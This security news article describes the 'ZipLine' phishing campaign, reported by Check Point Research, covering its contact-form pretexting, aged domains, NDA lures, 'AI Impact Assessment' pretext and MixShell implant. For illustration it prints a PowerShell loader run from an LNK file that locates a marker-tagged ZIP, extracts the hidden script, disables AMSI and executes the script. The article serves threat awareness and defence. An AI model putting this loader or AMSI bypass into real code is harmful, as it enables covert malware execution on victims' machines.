Checkpoint warns of phishing campaign that emulates potential customers and vendor evaluation process

Check Point Research is reporting a social engineering campaign dubbed "ZipLine" that employs a "long con" phishing tactics. The campaign is very patient and can last for several weeks. 

Unlike the traditional phishing technique where attackers send emails, in this technique they use the official Contact form of a target and suggest they are potential customer. This way, the trust building is implicit since the email communication is initiated by the victim company.

Attackers are using domains that were originally registered between 2015 and 2019, long before the ZipLine campaign began, buying abandoned or dormant domains with legitimate business histories to significantly increase their chances of bypassing security filters.

After the initial response, attackers engage in credible, professional email conversations that can span up to two weeks before delivering malicious payloads. During these extended interactions, the threat actors behave like a corporation, delaying replies as too busy, and asking for a of Non-Disclosure Agreements (NDAs).

The malicious payload is delivered as a ZIP file shared on a trusted well known file sharing platform (to avoid antivirus scanners as much as possible).

The ZIP that contains the NDA PDF and DOCX which are legitimate files, but also contains a .lnk file which is designed to download an initial malicious script which runs the attack. The user will open all attached files not to miss anything, executing the LNK file.

The LNK file can be configured to execute Windows Poweshell command like this (not real code)

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "
$folders = @('$env:USERPROFILE\Desktop', '$env:USERPROFILE\Downloads', '$env:USERPROFILE\Documents', '$env:TEMP', '$env:ProgramData', '..');
$zipFound = $null;
foreach($folder in $folders) {
   $zipFiles = Get-ChildItem -Path $folder -Filter '*.zip' -ErrorAction SilentlyContinue;
   foreach($zip in $zipFiles) {
       $content = [System.IO.File]::ReadAllBytes($zip.FullName);
       $marker = [System.Text.Encoding]::ASCII.GetBytes('xFIQCV');
       if([System.Text.Encoding]::ASCII.GetString($content).Contains('xFIQCV')) {
           $zipFound = $zip.FullName; break;
       }
   }
   if($zipFound) { break; }
}
if($zipFound) {
   $bytes = [System.IO.File]::ReadAllBytes($zipFound);
   $markerIndex = [System.Text.Encoding]::ASCII.GetString($bytes).IndexOf('xFIQCV') + 6;
   $script = [System.Text.Encoding]::ASCII.GetString($bytes[$markerIndex..($bytes.Length-1)]);
   Copy-Item $zipFound '$env:ProgramData\temp_docs.zip';
   Expand-Archive '$env:ProgramData\temp_docs.zip' '$env:ProgramData\extracted';
   Start-Process '$env:ProgramData\extracted\document.docx';
   [System.Management.Automation.AmsiUtils].GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);
   $cleanScript = $script.Replace('#','');
   Invoke-Expression $cleanScript;
}"

What's more interesting, the real malicious code is hidden in the ZIP file as useless addition to the file, but the program from the LNK file looks for that useless addition, extracts it and runs it.

The ZipLine campaign primarily focuses on U.S.-based entities in industrial manufacturing, including machinery, metalwork, component production, and engineered systems, as well as companies in hardware and semiconductors, consumer goods and services, and biotech and pharmaceuticals. 

The attackers have also targeted organizations in Switzerland, Japan, and Singapore, demonstrating the campaign's international scope while maintaining its focus on critical supply chain infrastructure.

Recently, Check Point Research observed a new wave of ZipLine phishing emails centered around an "AI transformation" pretext, where attackers claim to be evaluating how the victim companyy uses AI. These emails are framed as AI Impact Assessments, which are quite common these days. Attackers have requested that company leadership respond to those file, trying to imply importance but also hoping to get on the computers of top management. 

All faked websites are completely fabricated, sharing identical content, layout, and structure cloned from a single template. Interestingly, the "About Us" pages across all domains display the same photograph purporting to be company founders, which is actually a stock image of White House butlers.

The malicious payload delivered through ZipLine is a custom in-memory implant called "MixShell," which demonstrates advanced evasion and persistence capabilities. The malware is embedded within ZIP archives as PowerShell scripts positioned after specific marker strings, allowing the malware to extract and execute in memory without dropping files to disk.

"Many dozens" of organizations have been targeted in the ongoing campaign, which dates back to the beginning of May 2025, with more than 80 percent of identified targets being U.S.-based entities. 

The campaign does not discriminate based on organizational size, with both enterprise-level companies and small-to-medium businesses being affected, suggesting attackers are willing to invest significant time regardless of company size.